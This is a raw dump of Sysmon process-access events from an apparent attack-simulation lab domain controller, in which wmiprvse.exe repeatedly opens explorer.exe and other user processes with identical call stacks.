16:54:03.701{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.685{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240687Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 